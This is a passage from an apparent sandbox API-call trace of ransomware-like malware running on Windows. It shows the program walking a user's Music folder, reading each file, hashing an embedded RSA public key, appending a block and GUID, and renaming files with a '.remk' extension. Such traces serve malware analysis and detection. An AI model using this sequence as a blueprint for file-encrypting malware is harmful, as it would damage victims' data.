returned 1 [0232.174] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.177] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x8314, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.177] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.179] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.179] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.179] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x833a, lpOverlapped=0x0) returned 1 [0232.180] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.180] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.180] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.180] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.180] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.181] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.181] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.181] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.181] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.181] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.181] GetLastError () returned 0x0 [0232.182] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.182] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.182] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.182] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.182] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8340) returned 0x37c2278 [0232.182] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1ea8 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee148 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c1ef0 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee160 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee190 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.183] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1f0 | out: hHeap=0x630000) returned 1 [0232.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1f0 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1a8 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee190 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.183] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.184] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee190 | out: hHeap=0x630000) returned 1 [0232.184] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.185] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x833a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.185] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.185] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.185] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.185] CloseHandle (hObject=0x640) returned 1 [0232.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.189] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x37b5b70 [0232.189] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4KMSMI.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4kmsmi.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4KMSMI.mp3.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4kmsmi.mp3.remk")) returned 1 [0232.191] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0232.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.191] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.191] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini") returned=".ini" [0232.192] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe368050, ftCreationTime.dwHighDateTime=0x1d5e6c8, ftLastAccessTime.dwLowDateTime=0x162a83c0, ftLastAccessTime.dwHighDateTime=0x1d5e55a, ftLastWriteTime.dwLowDateTime=0x162a83c0, ftLastWriteTime.dwHighDateTime=0x1d5e55a, nFileSizeHigh=0x0, nFileSizeLow=0x16d79, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DOr_ T9_U6.mp3", cAlternateFileName="DOR_T9~1.MP3")) returned 1 [0232.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.192] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x693330 [0232.192] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOr_ T9_U6.mp3") returned=".mp3" [0232.192] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\DOr_ T9_U6.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dor_ t9_u6.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.193] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=93561) returned 1 [0232.193] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.196] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x16d53, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.196] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.198] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0232.198] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x16d79, lpOverlapped=0x0) returned 1 [0232.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.199] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.199] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.199] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0232.200] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.200] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.200] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.200] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.200] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.200] GetLastError () returned 0x0 [0232.201] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.201] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0232.201] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.201] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.201] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.201] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.201] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee208 | out: hHeap=0x630000) returned 1 [0232.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.202] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee208 [0232.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee1c0 [0232.202] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.237] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee1a8 [0232.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.254] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.278] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.285] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.301] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1c0 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee1a8 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee208 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.301] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.309] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.316] GetCurrentThreadId () returned 0x314 [0232.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.316] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b8f60 [0232.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.342] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.358] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.366] GetCurrentThreadId () returned 0x314 [0232.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.366] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.366] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.367] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0232.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.375] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee208 [0232.375] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.396] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1a8 [0232.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.397] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.397] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.405] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee1c0 [0232.406] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.406] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.406] HeapFree (in: hHeap=0x630000, 